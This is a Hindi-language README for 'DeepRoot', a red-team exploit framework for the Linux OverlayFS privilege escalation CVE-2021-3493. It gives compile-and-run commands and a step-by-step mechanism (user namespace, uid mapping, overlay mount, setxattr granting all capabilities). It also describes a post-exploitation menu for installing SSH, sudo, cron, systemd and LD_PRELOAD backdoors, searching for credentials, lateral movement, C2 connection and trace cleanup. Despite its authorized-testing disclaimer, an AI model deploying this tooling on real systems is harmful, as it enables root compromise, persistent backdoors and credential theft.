
CVE-2021-3493 OverlayFS विशेषाधिकार वृद्धि एक्सप्लॉइट फ्रेमवर्क जिसमें उन्नत रेड टीम सुविधाएँ शामिल हैं। इसमें पर्सिस्टेंस तंत्र, पोस्ट-एक्सप्लॉइटेशन मॉड्यूल, स्टेल्थ क्षमताएँ और व्यापक दस्तावेज़ीकरण शामिल हैं। केवल अधिकृत परीक्षण के लिए।
OverlayFS क्षमता विशेषाधिकार वृद्धि फ्रेमवर्क - रेड टीम प्रोफेशनल संस्करण
DeepRoot फ्रेमवर्क CVE-2021-3493 (OverlayFS विशेषाधिकार वृद्धि) के लिए एक व्यापक विशेषाधिकार वृद्धि एक्सप्लॉइट है, जिसमें उन्नत रेड टीम सुविधाएँ शामिल हैं, जिनमें पर्सिस्टेंस मैकेनिज्म, स्टील्थ क्षमताएँ और पोस्ट-एक्सप्लॉइटेशन मॉड्यूल शामिल हैं।
निर्माता: George S. Yanni
मूल एडवाइज़री: https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
DeepRoot फ्रेमवर्क निम्नलिखित के लिए डिज़ाइन किया गया है:
स्पष्ट प्राधिकरण के बिना उत्पादन प्रणालियों के विरुद्ध उपयोग न करें। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।
CVE-2021-3493 Linux OverlayFS फाइलसिस्टम में एक विशेषाधिकार वृद्धि भेद्यता है, जो एक अन-प्रिविलेज्ड उपयोगकर्ता को यूज़र नेमस्पेस में अनुचित क्षमता हैंडलिंग का फायदा उठाकर रूट विशेषाधिकार प्राप्त करने की अनुमति देती है।
मुख्य विशेषताएँ:
CLONE_NEWUSER) का उपयोग करता हैCLONE_NEWNS) का उपयोग करता हैsetxattr() के माध्यम से बाइनरी पर फ़ाइल क्षमताएँ सेट करता हैCAP_ALL_EP (सभी क्षमताएँ) सेट करता हैCVE-2021-3493/
├── comprehensive.c # Main exploit source code
├── README.md # This file
│
├── Option_1_Inject_SSH_backdoor_key/
│ └── README.md # SSH backdoor guide
│
├── Option_2_Install_sudo_backdoor/
│ └── README.md # Sudo backdoor guide
│
├── Option_3_Install_cron_persistence/
│ └── README.md # Cron persistence guide
│
├── Option_4_Install_systemd_service/
│ └── README.md # Systemd service guide
│
├── Option_5_Install_LD_PRELOAD_backdoor/
│ └── README.md # LD_PRELOAD backdoor guide
│
├── Option_6_Collect_system_information/
│ └── README.md # System info collection guide
│
├── Option_7_Search_for_credentials/
│ └── README.md # Credential search guide
│
├── Option_8_Check_lateral_movement/
│ └── README.md # Lateral movement guide
│
├── Option_9_Establish_C2_connection/
│ └── README.md # C2 connection guide
│
├── Option_Shell_and_Cleanup/
│ └── README.md # Shell and cleanup guide
│
└── Stealth_Mode_Guide/
└── README.md # Stealth mode documentation
gcc -o comprehensive comprehensive.c
# Run the exploit
./comprehensive
# The exploit will:
# 1. Create necessary directories (./ovlcap/)
# 2. Set up user and mount namespaces
# 3. Mount OverlayFS
# 4. Set capabilities on binary
# 5. Execute privileged binary
# 6. Present post-exploitation menu
सफल विशेषाधिकार वृद्धि के बाद, आप यह देखेंगे:
╔══════════════════════════════════════════════════╗
║ POST-EXPLOITATION MENU ║
╚══════════════════════════════════════════════════╝
Available actions:
1. Inject SSH backdoor key
2. Install sudo backdoor
3. Install cron persistence
4. Install systemd service
5. Install LD_PRELOAD backdoor
6. Collect system information
7. Search for credentials
8. Check lateral movement
9. Establish C2 connection
s. Spawn root shell
0. Cleanup and exit
Select option:
प्रत्येक विकल्प का अपना दस्तावेज़ीकरण फ़ोल्डर है जिसमें पूर्ण गाइड हैं:
kernel.unprivileged_userns_clone=1 या CAP_SYS_ADMIN)यह एक्सप्लॉइट CVE-2021-3493 के प्रति संवेदनशील सिस्टम को लक्षित करता है। अपने कर्नेल संस्करण की जाँच करें और सुनिश्चित करें कि यूज़र नेमस्पेस उपलब्ध हैं।
नेमस्पेस निर्माण: unshare(CLONE_NEWNS | CLONE_NEWUSER) का उपयोग करके नए यूज़र और माउंट नेमस्पेस बनाता है
UID/GID मैपिंग: /proc/self/uid_map और /proc/self/gid_map के माध्यम से नए नेमस्पेस के भीतर वर्तमान अन-प्रिविलेज्ड UID को 0 (रूट) पर मैप करता है
OverlayFS माउंट: lower, upper और work डायरेक्ट्रीज़ के साथ OverlayFS माउंट करता है
बाइनरी प्रतिलिपि: एक्सप्लॉइट बाइनरी को overlay merge डायरेक्ट्री में कॉपी करता है
क्षमता इंजेक्शन: कॉपी की गई बाइनरी पर CAP_ALL_EP (सभी क्षमताएँ, प्रभावी और अनुमत) सेट करने के लिए setxattr() का उपयोग करता है